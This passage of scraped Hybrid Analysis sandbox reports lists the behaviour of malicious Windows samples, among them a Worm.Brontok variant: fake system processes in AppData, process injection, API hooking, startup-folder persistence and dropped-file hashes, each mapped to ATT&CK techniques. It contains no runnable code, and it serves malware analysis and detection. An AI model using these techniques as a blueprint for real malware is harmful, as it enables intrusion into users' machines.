\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\share\\Data %OSUSER%.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\csrss.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\smss.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\winlogon.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\services.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\lsass.exe\" for deletion\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINLOGON.EXE\" for deletion\n \"D3_08.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DF3A391C706FC68AA9.TMP\" for deletion\n \"IExplorer.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\~DFE6824C15B3B845E8.TMP\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "api-31", "type": 6, "relevance": 9, "name": "Tries to access unusual system drive letters", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"K:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"L:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"M:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"N:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"O:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"P:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"Q:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"R:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"S:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"T:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"U:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"V:\"\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" touched \"W:\"", "origin": "API Call", "attck_id": "T1120", "attck_id_wiki": "https://attack.mitre.org/techniques/T1120"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" (UID: 00000000-00000940)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004664)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005576)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005612)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005784)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001308)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004040)\n Spawned process \"D3_08.exe\" (UID: 00000000-00004928)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005884)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005824)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00005972)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005792)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00005260)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003164)\n Spawned process \"D3_08.exe\" (UID: 00000000-00006032)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00006044)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00005588)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004112)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003100)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003120)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003168)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003988)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00004168)\n Spawned process \"D3_08.exe\" (UID: 00000000-00005636)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005428)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00004172)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001916)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00002068)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00006056)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004116)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00005980)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003856)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002060)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00005868)\n Spawned process \"D3_08.exe\" (UID: 00000000-00003928)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00001132)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00002608)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00003048)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00004280)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00004272)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00004224)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00003488)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00002792)\n Spawned process \"D3_08.exe\" (UID: 00000000-00001720)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00003024)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00002788)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00000600)\n Spawned process \"LSASS.EXE\" (UID: 00000000-00000708)\n Spawned process \"D3_08.exe\" (UID: 00000000-00002824)\n Spawned process \"WINLOGON.EXE\" (UID: 00000000-00001084)\n Spawned process \"SMSS.EXE\" (UID: 00000000-00000468)\n Spawned process \"CSRSS.EXE\" (UID: 00000000-00002820)\n Spawned process \"IExplorer.exe\" (UID: 00000000-00003904)\n Spawned process \"SERVICES.EXE\" (UID: 00000000-00003044)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 352)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 416)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 552)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 552)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 552)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 560)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 560)\n \"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 560)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SERVICES.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\LSASS.EXE\" (Handle: 424)\n \"D3_08.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"D3_08.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\SMSS.EXE\" (Handle: 368)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\D3_08.exe\" (Handle: 424)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\IExplorer.exe\" (Handle: 420)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\WINLOGON.EXE\" (Handle: 424)\n \"IExplorer.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)\n \"IExplorer.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Local\\WINDOWS\\CSRSS.EXE\" (Handle: 420)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\" allocated memory in \"C:\\04e480ffb5cd0e92001a1a1aeae06fdbff4113b732b007287331953fd6953526.exe\"\n \"D3_08.exe\" allocated memory in \"%WINDIR%\\D3_08.exe\"\n \"IExplorer.exe\" allocated memory in \"%WINDIR%\\system32\\IExplorer.exe\"\n \"WINLOGON.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\"\n \"CSRSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\CSRSS.EXE\"\n \"SERVICES.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SERVICES.EXE\"\n \"LSASS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\LSASS.EXE\"\n \"SMSS.EXE\" allocated memory in \"%APPDATA%\\WINDOWS\\SMSS.EXE\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001308)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004040)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005884)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005824)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00005260)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003164)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00005588)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003100)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003120)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003168)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003988)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00004168)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005428)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001916)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002068)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00006056)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004116)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00005980)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003856)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002060)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00005868)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00001132)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00003048)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00004280)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004272)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00004224)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003488)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002792)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00003024)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00002788)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000708)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00001084)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000468)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002820)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00003044)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00000176)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00002168)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00003068)\n Process \"CSRSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\CSRSS.EXE\" (UID: 00000000-00002300)\n Process \"SERVICES.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SERVICES.EXE\" (UID: 00000000-00004252)\n Process \"LSASS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\LSASS.EXE\" (UID: 00000000-00002880)\n Process \"SMSS.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\SMSS.EXE\" (UID: 00000000-00000620)\n Process \"WINLOGON.EXE\" at non-system pathway \"%APPDATA%\\WINDOWS\\WINLOGON.EXE\" (UID: 00000000-00002084)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "hooks-2", "type": 11, "relevance": 10, "name": "Hooks file system APIs", "description": "\"FindFirstFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"WINLOGON.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"LSASS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SMSS.EXE\"\n \"FindFirstFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindFirstFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileA@KERNEL32.DLL\" in \"SERVICES.EXE\"\n \"FindNextFileW@KERNEL32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "hooks-5", "type": 11, "relevance": 10, "name": "Hooks internet related APIs", "description": "\"send@WS2_32.DLL\" in \"WINLOGON.EXE\"\n \"send@WS2_32.DLL\" in \"LSASS.EXE\"\n \"send@WS2_32.DLL\" in \"SMSS.EXE\"\n \"send@WS2_32.DLL\" in \"SERVICES.EXE\"", "origin": "Hook Detection", "attck_id": "T1056.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1
https://hybrid-analysis.com/sample/0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1
Hybrid Analysis - Killers
{"size": 93728, "type": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "submit_name": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "av_detect": 89, "vx_family": "Worm.Brontok", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 3, "total_processes": 64, "total_signatures": 141, "extracted_files": [{"name": "Empty.pif", "file_path": "%ALLUSERSPROFILE%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Empty.pif", "file_size": 93728, "sha256": "24d04f76dd9675c2920372ef2b49859a14104c03305cc2ef023e0276797d0743", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "4k51k4.exe", "file_path": "%LOCALAPPDATA%\\4k51k4.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\CSRSS.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "IExplorer.exe", "file_path": "%LOCALAPPDATA%\\IExplorer.exe", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\LSASS.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": "%LOCALAPPDATA%\\SERVICES.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SMSS.EXE", "file_path": "%LOCALAPPDATA%\\SMSS.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "CSRSS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\CSRSS.EXE", "file_size": 93728, "sha256": "0829607730ba267f8a2f7647e7a4cb8bf2f8b2e245792bab145c43376adafbe1", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "LSASS.EXE", "file_path": "%LOCALAPPDATA%\\WINDOWS\\LSASS.EXE", "file_size": 93728, "sha256": "54d82ceefc72121f571ba05be9d6538b6d0be0f1a2058cf653240a5e2b5eefc5", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed", "runtime_process": "WINLOGON.EXE (PID: 3924)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "SERVICES.EXE", "file_path": 